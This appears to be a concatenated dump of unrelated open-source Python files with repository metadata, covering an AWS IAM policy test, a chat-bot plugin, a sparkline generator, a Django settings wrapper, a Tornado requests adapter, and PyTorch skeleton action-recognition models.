logging_level = logging.INFO
# statement = IAMStatement('Allow',["pot:atosoup","goat:cheese"],'*', logging_level = logging_level)
# statement.get_statement()
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_statement(statement)
# print(policy.print_policy())
# print(policy.get_policy())
# arn = Arn('arn:aws:iam::281782457076:role/1s_tear_down_role', logging_level = logging.DEBUG)
# # arn = Arn('arn:aws:iam:us-east-1:842337631775:role/service-role/StatesExecutionRole-us-west-2')
# policy = IAMPolicy(logging_level = logging_level)
# policy.add_action('lambda:Invoke')
# policy.add_action('lambda:Potato20160303')
# policy.add_action('ec2:RunInstances')
# policy.add_action('ec2:StartInstances')
# policy.add_action('monitoring:CreateAlarm')
# print(policy.print_policy())
arn = Arn('arn:aws:sts::281782457076:assumed-role/1s_tear_down_role/lanbda-function-name', logging_level = logging.DEBUG)
print(arn.is_role())
print(arn.is_policy())
print(arn.is_assumed_role())
print(arn.get_full_arn())
arn.convert_assumed_role_to_role()
print(arn.get_full_arn())
def test_iam_policy_class():
"""Test Athena Query"""
policy = IAMPolicy(logging_level = logging_level)
policy.add_action('lambda:Invoke')
policy.add_action('ec2:RunInstances')
policy.add_action('ec2:StartInstances')
policy.add_action('monitoring:CreateAlarm')
assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
# policy.add_action('ec2:RunInstances')
# policy.add_action('ec2:StartInstances')
# policy.add_action('monitoring:CreateAlarm')
# assert policy.print_policy() == json.dumps({"Version": "2012-10-17", "Statement": [{"Action": ["ec2:RunInstances", "ec2:StartInstances"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltEc2Policy"}, {"Action": ["cloudwatch:CreateAlarm"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltCloudwatchPolicy"}, {"Action": ["lambda:Invoke"], "Resource": "*", "Effect": "Allow", "Sid": "SecurityFairyBuiltLambdaPolicy"}]})
```
#### File: 1Strategy/security-fairy/variable_injection.py
```python
import os
import boto3
def lambda_handler(event, context):
""" Executed by Lambda service.
Define and return runtime-specific
environment variables.
"""
name = os.environ['AWS_LAMBDA_FUNCTION_NAME']
region = os.environ['AWS_REGION']
version = os.environ['AWS_LAMBDA_FUNCTION_VERSION']
lambda_client = boto3.client('lambda', region_name=region)
lambda_function = lambda_client.get_function(FunctionName=name, Qualifier=version)
raw_env_vars = lambda_function['Configuration']['Environment']['Variables']
for key, value in raw_env_vars.items():
event[key] = value
return event
``` |
{
"source": "1stvamp/hippybot",
"score": 3
} |
#### File: hippybot/plugins/wave.py
```python
from collections import Counter
from hippybot.decorators import botcmd
class Plugin(object):
"""HippyBot plugin to make the bot complete a wave if 3 people in a
row do the action "\o/".
"""
global_commands = ['\o/', 'wave']
command_aliases = {'\o/': 'wave'}
counts = Counter()
def __init__(self, config):
pass
@botcmd
def wave(self, mess, args):
"""
If enough people \o/, techbot will too.
Everyone loves a follower, well, techbot is here to fulfill that need
"""
channel = unicode(mess.getFrom()).split('/')[0]
self.bot.log.info("\o/ %s" %self.counts[channel])
if not self.bot.from_bot(mess):
self.counts[channel] += 1
if self.counts[channel] == 3:
self.counts[channel] = 0
return r'\o/'
``` |
{
"source": "1stvamp/py-sparkblocks",
"score": 4
} |
#### File: py-sparkblocks/sparkblocks/__init__.py
```python
from __future__ import division

import math
def spark(numbers):
"""Generate a text based sparkline graph from a list of numbers (ints or
floats).
Based on:
https://github.com/holman/spark
and:
http://www.datadrivenconsulting.com/2010/06/twitter-sparkline-generator/
"""
out = []
min_value = min(numbers)
max_value = max(numbers)
value_scale = max_value - min_value
for number in numbers:
if (number - min_value) != 0 and value_scale != 0:
scaled_value = (number - min_value) / value_scale
else:
scaled_value = 0
num = math.floor(min([6, (scaled_value * 7)]))
# Hack because 9604 and 9608 aren't vertically aligned the same as
# other block elements
if num == 3:
if (scaled_value * 7) < 3.5:
num = 2
else:
num = 4
elif num == 7:
num = 6
out.append(unichr(int(9601 + num)))
return ''.join(out)
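
if __name__ == '__main__':
    # Minimal usage sketch (illustration only; Python 2, which the unichr()
    # call above targets). Prints one block character per value in the
    # arbitrary sample list, scaled between its min and max.
    print(spark([1, 5, 22, 13, 53]))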
``` |
{
"source": "1stvamp/settings-wrapper",
"score": 2
} |
#### File: 1stvamp/settings-wrapper/patch_settings.py
```python
import django_project
from django_project import settings
from threading import local
from types import ModuleType

# Module-level thread-local storage; request-tracking middleware is expected to
# set `django_current_request` on this object for each request.
_thread_locals = local()
class module(ModuleType):
def __getattr__(self, name):
if name == 'STATIC_URL':
return self.get_static_url()
return getattr(settings, name)
def __setattr__(self, name, value):
return setattr(settings, name, value)
def get_static_url(self):
        request = getattr(_thread_locals, 'django_current_request', None)
static_url = settings.STATIC_URL
if request and request.META.get('HTTP_HOST') in \
                settings.STATIC_URL_MAP:
static_url = settings.STATIC_URL_MAP[request.META.get('HTTP_HOST')]
return static_url
django_project.settings = module('django_project.settings')
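
# Illustration only (not from the original project): something has to populate
# the thread-local read by get_static_url(). The class name and old-style
# middleware hooks below are assumptions for the sketch.
class CurrentRequestMiddleware(object):
    def process_request(self, request):
        _thread_locals.django_current_request = request

    def process_response(self, request, response):
        _thread_locals.django_current_request = None
        return response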
``` |
{
"source": "1stvamp/trequests",
"score": 3
} |
#### File: trequests/trequests/__init__.py
```python
from os import path
from urlparse import urlparse
import requests
from tornado.httpclient import AsyncHTTPClient
from tornado.simple_httpclient import SimpleAsyncHTTPClient
from tornalet import asyncify
def get_version_string():
return open(path.join(path.dirname(__file__),
'trequests_version.txt'), 'r').read().strip()
def get_version():
return get_version_string().split('.')
__version__ = get_version_string()
# Don't know how to handle this yet, so just mock it out for now
requests.adapters.extract_cookies_to_jar = lambda a, b, c: None
class AsyncHTTPAdapter(requests.adapters.HTTPAdapter):
"""A python-requests HTTP/HTTPS adapter that uses the Tornado
AsyncHTTPClient and greenlets (via the tornalet library) to perform a
non-blocking call inside the Tornado IOLoop whenever a
requests.[get/post/put/delete/request]() call is made. It then wraps the
tornado.httpclient.HTTPResponse as a requests.models.Response instance and
returns so that any library calling requests gets what it expects (mostly).
"""
def send(self, request, stream=False, timeout=None, verify=True,
cert=None, proxies=None):
http_client = AsyncHTTPClient()
# This where the magic happens, tornalet.asyncify wraps the parent
# call in a greenlet that can be swapped out the same as any
# aync tornado IO handler call.
if isinstance(http_client, SimpleAsyncHTTPClient):
resp = asyncify(http_client.fetch)(request=request.url,
method=request.method,
body=request.body,
headers=request.headers,
validate_cert=verify,
request_timeout=timeout,
)
        else:  # only curl_httpclient supports proxies
proxy_host, proxy_port, proxy_username, proxy_password = self._parse_proxy_url(proxies)
resp = asyncify(http_client.fetch)(request=request.url,
method=request.method,
body=request.body,
headers=request.headers,
validate_cert=verify,
request_timeout=timeout,
proxy_host=proxy_host,
proxy_port=proxy_port,
proxy_username=proxy_username,
                                               proxy_password=proxy_password,
)
# We probably don't get this from any of the tornado adaptors, so
# we stub it out as Unknown
resp.reason = 'Unknown'
resp.content = resp.body
r = self.build_response(request, resp)
# Reset the code and content as they're not parsed by build_response
r.status_code = resp.code
r._content = resp.content
r.url = resp.effective_url
return r
def _parse_proxy_url(self, proxies):
proxy_host = proxy_port = proxy_username = proxy_password = None
if proxies:
if proxies.get('http', None):
url = proxies['http']
elif proxies.get('https', None):
url = proxies['https']
try:
o = urlparse(url)
proxy_host, proxy_port, proxy_username, proxy_password = o.hostname, o.port, o.username, o.password
return proxy_host, proxy_port, proxy_username, proxy_password
        except Exception:
return proxy_host, proxy_port, proxy_username, proxy_password
def setup_session(session=None, mounts=None, http_client=None):
"""Mount the AsyncHTTPAdapter for a given session instance,
or for the default instance in python-requests, for a given set of mounts
or just for the default HTTP/HTTPS protocols.
"""
if http_client == "curl": # choose CurlAsyncHTTPClient
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
    # Track whether the caller passed a session *before* assigning a default,
    # otherwise the monkey-patching branch below is unreachable.
    patch_default_session = session is None
    if patch_default_session:
        session = requests.session()
    if mounts is None:
        mounts = ('http://', 'https://')
    def _session():
        for mount in mounts:
            session.mount(mount, AsyncHTTPAdapter())
        return session
    if patch_default_session:
        requests.session = requests.sessions.session = _session
    else:
        _session()
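
if __name__ == '__main__':
    # Minimal usage sketch (illustration only): assumes a Tornado application
    # and the `tornalet` request-handler decorator exported by the tornalet
    # package already used above; the URL is an arbitrary example.
    import tornado.ioloop
    import tornado.web
    from tornalet import tornalet

    session = requests.session()
    setup_session(session=session)  # mount AsyncHTTPAdapter on this session

    class ExampleHandler(tornado.web.RequestHandler):
        @tornalet
        def get(self):
            # Runs inside a greenlet, so the blocking-looking call below
            # does not block the IOLoop.
            resp = session.get('https://httpbin.org/get')
            self.write('upstream status: %s' % resp.status_code)

    application = tornado.web.Application([(r'/', ExampleHandler)])
    application.listen(8888)
    tornado.ioloop.IOLoop.instance().start()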
``` |
{
"source": "1suancaiyu/AS-GCN",
"score": 2
} |
#### File: AS-GCN/net/as_gcn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from net.utils.graph import Graph
class Model(nn.Module):
def __init__(self, in_channels, num_class, graph_args,
edge_importance_weighting, **kwargs):
super().__init__()
self.graph = Graph(**graph_args)
A = torch.tensor(self.graph.A, dtype=torch.float32, requires_grad=False)
self.register_buffer('A', A)
self.edge_type = 2
temporal_kernel_size = 9
spatial_kernel_size = A.size(0) + self.edge_type
st_kernel_size = (temporal_kernel_size, spatial_kernel_size)
self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))
self.class_layer_0 = StgcnBlock(in_channels, 64, st_kernel_size, self.edge_type, stride=1, residual=False, **kwargs)
self.class_layer_1 = StgcnBlock(64, 64, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_2 = StgcnBlock(64, 64, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_3 = StgcnBlock(64, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.class_layer_4 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_5 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_6 = StgcnBlock(128, 256, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.class_layer_7 = StgcnBlock(256, 256, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.class_layer_8 = StgcnBlock(256, 256, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.recon_layer_0 = StgcnBlock(256, 128, st_kernel_size, self.edge_type, stride=1, **kwargs)
self.recon_layer_1 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.recon_layer_2 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.recon_layer_3 = StgcnBlock(128, 128, st_kernel_size, self.edge_type, stride=2, **kwargs)
self.recon_layer_4 = StgcnBlock(128, 128, (3, spatial_kernel_size), self.edge_type, stride=2, **kwargs)
self.recon_layer_5 = StgcnBlock(128, 128, (5, spatial_kernel_size), self.edge_type, stride=1, padding=False, residual=False, **kwargs)
self.recon_layer_6 = StgcnReconBlock(128+3, 30, (1, spatial_kernel_size), self.edge_type, stride=1, padding=False, residual=False, activation=None, **kwargs)
if edge_importance_weighting:
self.edge_importance = nn.ParameterList([nn.Parameter(torch.ones(self.A.size())) for i in range(9)])
self.edge_importance_recon = nn.ParameterList([nn.Parameter(torch.ones(self.A.size())) for i in range(9)])
else:
self.edge_importance = [1] * (len(self.st_gcn_networks)+len(self.st_gcn_recon))
self.fcn = nn.Conv2d(256, num_class, kernel_size=1)
def forward(self, x, x_target, x_last, A_act, lamda_act):
N, C, T, V, M = x.size()
x_recon = x[:,:,:,:,0] # [2N, 3, 300, 25] wsx: x_recon(4,3,290,25) select the first person data?
x = x.permute(0, 4, 3, 1, 2).contiguous() # [N, 2, 25, 3, 300] wsx: x(4,2,25,3,290)
x = x.view(N * M, V * C, T) # [2N, 75, 300]m wsx: x(8,75,290)
x_last = x_last.permute(0,4,1,2,3).contiguous().view(-1,3,1,25) #(2N,3,1,25)
x_bn = self.data_bn(x)
x_bn = x_bn.view(N, M, V, C, T)
x_bn = x_bn.permute(0, 1, 3, 4, 2).contiguous()
x_bn = x_bn.view(N * M, C, T, V) #2N,3,290,25
h0, _ = self.class_layer_0(x_bn, self.A * self.edge_importance[0], A_act, lamda_act) # [N, 64, 300, 25]
        h1, _ = self.class_layer_1(h0, self.A * self.edge_importance[1], A_act, lamda_act) # [N, 64, 300, 25]
h2, _ = self.class_layer_2(h1, self.A * self.edge_importance[2], A_act, lamda_act) # [N, 64, 300, 25]
h3, _ = self.class_layer_3(h2, self.A * self.edge_importance[3], A_act, lamda_act) # [N, 128, 150, 25]
h4, _ = self.class_layer_4(h3, self.A * self.edge_importance[4], A_act, lamda_act) # [N, 128, 150, 25]
h5, _ = self.class_layer_5(h4, self.A * self.edge_importance[5], A_act, lamda_act) # [N, 128, 150, 25]
h6, _ = self.class_layer_6(h5, self.A * self.edge_importance[6], A_act, lamda_act) # [N, 256, 75, 25]
h7, _ = self.class_layer_7(h6, self.A * self.edge_importance[7], A_act, lamda_act) # [N, 256, 75, 25]
h8, _ = self.class_layer_8(h7, self.A * self.edge_importance[8], A_act, lamda_act) # [N, 256, 75, 25]
x_class = F.avg_pool2d(h8, h8.size()[2:]) #(8,256,1,1)
x_class = x_class.view(N, M, -1, 1, 1).mean(dim=1) #(4,256,1,1)
x_class = self.fcn(x_class) #(4,60,1,1) Conv2d(256, 60, kernel_size=(1, 1), stride=(1, 1))
x_class = x_class.view(x_class.size(0), -1) #(4,60)
r0, _ = self.recon_layer_0(h8, self.A*self.edge_importance_recon[0], A_act, lamda_act) # [N, 128, 75, 25]
r1, _ = self.recon_layer_1(r0, self.A*self.edge_importance_recon[1], A_act, lamda_act) # [N, 128, 38, 25]
r2, _ = self.recon_layer_2(r1, self.A*self.edge_importance_recon[2], A_act, lamda_act) # [N, 128, 19, 25]
r3, _ = self.recon_layer_3(r2, self.A*self.edge_importance_recon[3], A_act, lamda_act) # [N, 128, 10, 25]
r4, _ = self.recon_layer_4(r3, self.A*self.edge_importance_recon[4], A_act, lamda_act) # [N, 128, 5, 25]
r5, _ = self.recon_layer_5(r4, self.A*self.edge_importance_recon[5], A_act, lamda_act) # [N, 128, 1, 25]
r6, _ = self.recon_layer_6(torch.cat((r5, x_last),1), self.A*self.edge_importance_recon[6], A_act, lamda_act) # [N, 64, 1, 25] wsx:(8,30,1,25)
pred = x_last.squeeze().repeat(1,10,1) + r6.squeeze() # [N, 3, 25] wsx:(8,30,25)
pred = pred.contiguous().view(-1, 3, 10, 25)
x_target = x_target.permute(0,4,1,2,3).contiguous().view(-1,3,10,25)
return x_class, pred[::2], x_target[::2]
def extract_feature(self, x):
N, C, T, V, M = x.size()
x = x.permute(0, 4, 3, 1, 2).contiguous()
x = x.view(N * M, V * C, T)
x = self.data_bn(x)
x = x.view(N, M, V, C, T)
x = x.permute(0, 1, 3, 4, 2).contiguous()
x = x.view(N * M, C, T, V)
for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):
x, _ = gcn(x, self.A * importance)
_, c, t, v = x.size()
feature = x.view(N, M, c, t, v).permute(0, 2, 3, 4, 1)
x = self.fcn(x)
output = x.view(N, M, -1, t, v).permute(0, 2, 3, 4, 1)
return output, feature
class StgcnBlock(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size,
edge_type=2,
t_kernel_size=1,
stride=1,
padding=True,
dropout=0,
residual=True):
super().__init__()
assert len(kernel_size) == 2
assert kernel_size[0] % 2 == 1
if padding == True:
padding = ((kernel_size[0] - 1) // 2, 0)
else:
padding = (0,0)
self.gcn = SpatialGcn(in_channels=in_channels,
out_channels=out_channels,
k_num=kernel_size[1],
edge_type=edge_type,
t_kernel_size=t_kernel_size)
self.tcn = nn.Sequential(nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(out_channels,
out_channels,
(kernel_size[0], 1),
(stride, 1),
padding),
nn.BatchNorm2d(out_channels),
nn.Dropout(dropout, inplace=True))
if not residual:
self.residual = lambda x: 0
elif (in_channels == out_channels) and (stride == 1):
self.residual = lambda x: x
else:
self.residual = nn.Sequential(nn.Conv2d(in_channels,
out_channels,
kernel_size=1,
stride=(stride, 1)),
nn.BatchNorm2d(out_channels))
self.relu = nn.ReLU(inplace=True)
def forward(self, x, A, B, lamda_act):
res = self.residual(x)
x, A = self.gcn(x, A, B, lamda_act)
x = self.tcn(x) + res
return self.relu(x), A
class StgcnReconBlock(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size,
edge_type=2,
t_kernel_size=1,
stride=1,
padding=True,
dropout=0,
residual=True,
activation='relu'):
super().__init__()
assert len(kernel_size) == 2
assert kernel_size[0] % 2 == 1
if padding == True:
padding = ((kernel_size[0] - 1) // 2, 0)
else:
padding = (0,0)
self.gcn_recon = SpatialGcnRecon(in_channels=in_channels,
out_channels=out_channels,
k_num=kernel_size[1],
edge_type=edge_type,
t_kernel_size=t_kernel_size)
self.tcn_recon = nn.Sequential(nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=out_channels,
out_channels=out_channels,
kernel_size=(kernel_size[0], 1),
stride=(stride, 1),
padding=padding,
output_padding=(stride-1,0)),
nn.BatchNorm2d(out_channels),
nn.Dropout(dropout, inplace=True))
if not residual:
self.residual = lambda x: 0
elif (in_channels == out_channels) and (stride == 1):
self.residual = lambda x: x
else:
self.residual = nn.Sequential(nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
stride=(stride, 1),
output_padding=(stride-1,0)),
nn.BatchNorm2d(out_channels))
self.relu = nn.ReLU(inplace=True)
self.activation = activation
def forward(self, x, A, B, lamda_act):
res = self.residual(x)
x, A = self.gcn_recon(x, A, B, lamda_act)
x = self.tcn_recon(x) + res
if self.activation == 'relu':
x = self.relu(x)
else:
x = x
return x, A
class SpatialGcn(nn.Module):
def __init__(self,
in_channels,
out_channels,
k_num,
edge_type=2,
t_kernel_size=1,
t_stride=1,
t_padding=0,
t_dilation=1,
bias=True):
super().__init__()
self.k_num = k_num
self.edge_type = edge_type
self.conv = nn.Conv2d(in_channels=in_channels,
out_channels=out_channels*k_num,
kernel_size=(t_kernel_size, 1),
padding=(t_padding, 0),
stride=(t_stride, 1),
dilation=(t_dilation, 1),
bias=bias)
def forward(self, x, A, B, lamda_act):
x = self.conv(x)
n, kc, t, v = x.size()
x = x.view(n, self.k_num, kc//self.k_num, t, v)
x1 = x[:,:self.k_num-self.edge_type,:,:,:]
x2 = x[:,-self.edge_type:,:,:,:]
x1 = torch.einsum('nkctv,kvw->nctw', (x1, A))
x2 = torch.einsum('nkctv,nkvw->nctw', (x2, B))
x_sum = x1+x2*lamda_act
return x_sum.contiguous(), A
class SpatialGcnRecon(nn.Module):
def __init__(self, in_channels, out_channels, k_num, edge_type=3,
t_kernel_size=1, t_stride=1, t_padding=0, t_outpadding=0, t_dilation=1,
bias=True):
super().__init__()
self.k_num = k_num
self.edge_type = edge_type
self.deconv = nn.ConvTranspose2d(in_channels=in_channels,
out_channels=out_channels*k_num,
kernel_size=(t_kernel_size, 1),
padding=(t_padding, 0),
output_padding=(t_outpadding, 0),
stride=(t_stride, 1),
dilation=(t_dilation, 1),
bias=bias)
def forward(self, x, A, B, lamda_act):
x = self.deconv(x)
n, kc, t, v = x.size()
x = x.view(n, self.k_num, kc//self.k_num, t, v)
x1 = x[:,:self.k_num-self.edge_type,:,:,:]
x2 = x[:,-self.edge_type:,:,:,:]
x1 = torch.einsum('nkctv,kvw->nctw', (x1, A))
x2 = torch.einsum('nkctv,nkvw->nctw', (x2, B))
x_sum = x1+x2*lamda_act
return x_sum.contiguous(), A
```
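The two `einsum` contractions in `SpatialGcn.forward` above combine the fixed, shared adjacency `A` (one matrix per graph partition) with the per-sample actional adjacency `B` (the `A_act` argument), whose contribution is scaled by `lamda_act`. A shape-only sketch with arbitrary sizes:
```python
import torch

n, k_fixed, k_act, c, t, v = 2, 3, 2, 4, 5, 25     # arbitrary example sizes
x1 = torch.randn(n, k_fixed, c, t, v)              # features for the fixed partitions
x2 = torch.randn(n, k_act, c, t, v)                # features for the actional partitions
A = torch.randn(k_fixed, v, v)                     # shared adjacency, one matrix per partition
B = torch.randn(n, k_act, v, v)                    # per-sample adjacency (A_act)
lamda_act = 0.5

x1_agg = torch.einsum('nkctv,kvw->nctw', x1, A)    # aggregate over the fixed graph
x2_agg = torch.einsum('nkctv,nkvw->nctw', x2, B)   # aggregate over the actional graph
out = x1_agg + x2_agg * lamda_act
print(out.shape)                                   # torch.Size([2, 4, 5, 25])
```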
#### File: AS-GCN/net/model_poseformer.py
```python
import math
import logging
from functools import partial
from collections import OrderedDict
from einops import rearrange, repeat
import torch
import torch.nn as nn
import torch.nn.functional as F
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.models.helpers import load_pretrained
from timm.models.layers import DropPath, to_2tuple, trunc_normal_
from timm.models.registry import register_model
class Mlp(nn.Module):
def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
# NOTE scale factor was wrong in my original version, can set manually to be compat with prev weights
self.scale = qk_scale or head_dim ** -0.5
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.attn_drop = nn.Dropout(attn_drop)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
def forward(self, x):
B, N, C = x.shape
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)
attn = (q @ k.transpose(-2, -1)) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
x = self.proj(x)
x = self.proj_drop(x)
return x
class Block(nn.Module):
def __init__(self, dim, num_heads, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop=0., attn_drop=0.,
drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):
super().__init__()
self.norm1 = norm_layer(dim)
self.attn = Attention(
dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
# NOTE: drop path for stochastic depth, we shall see if this is better than dropout here
self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
def forward(self, x):
x = x + self.drop_path(self.attn(self.norm1(x)))
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
class PoseTransformer(nn.Module):
def __init__(self, num_frame=9, num_joints=25, in_chans=3, embed_dim_ratio: object = 32, depth=4,
num_heads=8, mlp_ratio=2., qkv_bias=True, qk_scale=None,
drop_rate=0., attn_drop_rate=0., drop_path_rate=0.2, norm_layer=None,
num_class=60
):
""" ##########hybrid_backbone=None, representation_size=None,
Args:
num_frame (int, tuple): input frame number
num_joints (int, tuple): joints number
in_chans (int): number of input channels, 2D joints have 2 channels: (x,y)
embed_dim_ratio (int): embedding dimension ratio
depth (int): depth of transformer
num_heads (int): number of attention heads
mlp_ratio (int): ratio of mlp hidden dim to embedding dim
qkv_bias (bool): enable bias for qkv if True
qk_scale (float): override default qk scale of head_dim ** -0.5 if set
drop_rate (float): dropout rate
attn_drop_rate (float): attention dropout rate
drop_path_rate (float): stochastic depth rate
norm_layer: (nn.Module): normalization layer
            num_class (int): number of output action classes
"""
super().__init__()
norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)
embed_dim = embed_dim_ratio * num_joints #### temporal embed_dim is num_joints * spatial embedding dim ratio
out_dim = num_joints * 3 #### output dimension is num_joints * 3
### spatial patch embedding
self.Spatial_patch_to_embedding = nn.Linear(3, 32)
self.Spatial_pos_embed = nn.Parameter(torch.zeros(1, num_joints, embed_dim_ratio))
self.Temporal_pos_embed = nn.Parameter(torch.zeros(1, num_frame, embed_dim))
self.pos_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)] # stochastic depth decay rule
self.Spatial_blocks = nn.ModuleList([
Block(
dim=embed_dim_ratio, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
for i in range(depth)])
self.blocks = nn.ModuleList([
Block(
dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
for i in range(depth)])
self.Spatial_norm = norm_layer(embed_dim_ratio)
self.Temporal_norm = norm_layer(embed_dim)
####### A easy way to implement weighted mean
self.weighted_mean = torch.nn.Conv1d(in_channels=num_frame, out_channels=1, kernel_size=1)
self.head = nn.Sequential(
nn.LayerNorm(embed_dim),
nn.Linear(embed_dim , out_dim),
)
# wsx aciton_class_head
self.action_class_head = nn.Conv2d(290, num_class, kernel_size=1)
# self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))
self.data_bn = nn.BatchNorm1d(3 * 25)
def Spatial_forward_features(self, x):
b, _, f, p = x.shape ##### b is batch size, f is number of frames, p is number of joints
x = rearrange(x, 'b c f p -> (b f) p c', )
x = self.Spatial_patch_to_embedding(x)
x += self.Spatial_pos_embed
x = self.pos_drop(x)
for blk in self.Spatial_blocks:
x = blk(x)
x = self.Spatial_norm(x)
x = rearrange(x, '(b f) w c -> b f (w c)', f=f)
return x
def forward_features(self, x):
b = x.shape[0]
x += self.Temporal_pos_embed
x = self.pos_drop(x)
for blk in self.blocks:
x = blk(x)
x = self.Temporal_norm(x)
##### x size [b, f, emb_dim], then take weighted mean on frame dimension, we only predict 3D pose of the center frame
# x = self.weighted_mean(x) #wsx don't change all frame to one
# x = x.view(b, 1, -1)
return x
def forward(self, x, x_target):
'''
# x input shape [170, 81, 17, 2]
x = x.permute(0, 3, 1, 2) #[170, 2, 81, 17]
b, _, _, p = x.shape #[170, 2, 81, 17] b:batch_size p:joint_num
### now x is [batch_size, 2 channels, receptive frames, joint_num], following image data
'''
N, C, T, V, M = x.size()
x = x.permute(0, 4, 3, 1, 2).contiguous()
x = x.view(N * M, V * C, T)
x = self.data_bn(x)
x = x.view(N, M, V, C, T)
x = x.permute(0, 1, 3, 4, 2).contiguous()
x = x.view(N * M, C, T, V)
x = self.Spatial_forward_features(x)
x = self.forward_features(x) # (2n, 290,800)
# action_class_head
BatchN, FrameN, FutureN = x.size()
x = x.view(BatchN, FrameN, FutureN, 1)
x_class = F.avg_pool2d(x, x.size()[2:])
x_class = x_class.view(N, M, -1, 1, 1).mean(dim=1)
x_class = self.action_class_head(x_class)
x_class = x_class.view(x_class.size(0), -1)
#action_class = x.permute(0,2,1) #[170, 544, 1]
#action_class = self.action_class_head(action_class)
#action_class = torch.squeeze(action_class)
#x = self.head(x)
#x = x.view(b, 1, p, -1)
x_target = x_target.permute(0, 4, 1, 2, 3).contiguous().view(-1, 3, 10, 25)
return x_class, x_target[::2] # [170,1,17,3]
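
if __name__ == '__main__':
    # Minimal instantiation sketch (illustration only; requires the timm and
    # einops dependencies imported above). num_frame must be 290 here because
    # action_class_head hard-codes 290 input channels; other sizes are arbitrary.
    model = PoseTransformer(num_frame=290, num_joints=25, in_chans=3,
                            embed_dim_ratio=32, depth=4, num_heads=8, num_class=60)
    x = torch.randn(2, 3, 290, 25, 2)         # (N, C, T, V, M) skeleton sequence
    x_target = torch.randn(2, 3, 10, 25, 2)   # (N, C, T', V, M) prediction target
    logits, target = model(x, x_target)
    print(logits.shape, target.shape)         # (2, 60) and (2, 3, 10, 25)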
``` |
{
"source": "1suancaiyu/Locality-Awareness-SGE",
"score": 2
} |
#### File: 1suancaiyu/Locality-Awareness-SGE/evaluate.py
```python
import tensorflow as tf
from tensorflow.python.layers.core import Dense
import numpy as np
import time
import matplotlib as mpl
import copy
import os
from tensorflow.python.ops import rnn_cell_impl
# mpl.use('Agg')
# import matplotlib.pyplot as plt
import os
# Number of Epochs
epochs = 100
# Batch Size
batch_size = 128
# RNN Size k = 256
rnn_size = 256
# Number of Layers, 2-layer LSTM
num_layers = 2
# Time Steps of Input, f = 6 skeleton frames
time_steps = 6
# Length of Series, J = 20 body joints in a sequence
series_length = 20
# Learning Rate
learning_rate = 0.0005
lr_decay = 0.95
momentum = 0.5
lambda_l2_reg = 0.02
dataset = False
attention = False
manner = False
gpu = False
permutation_flag = False
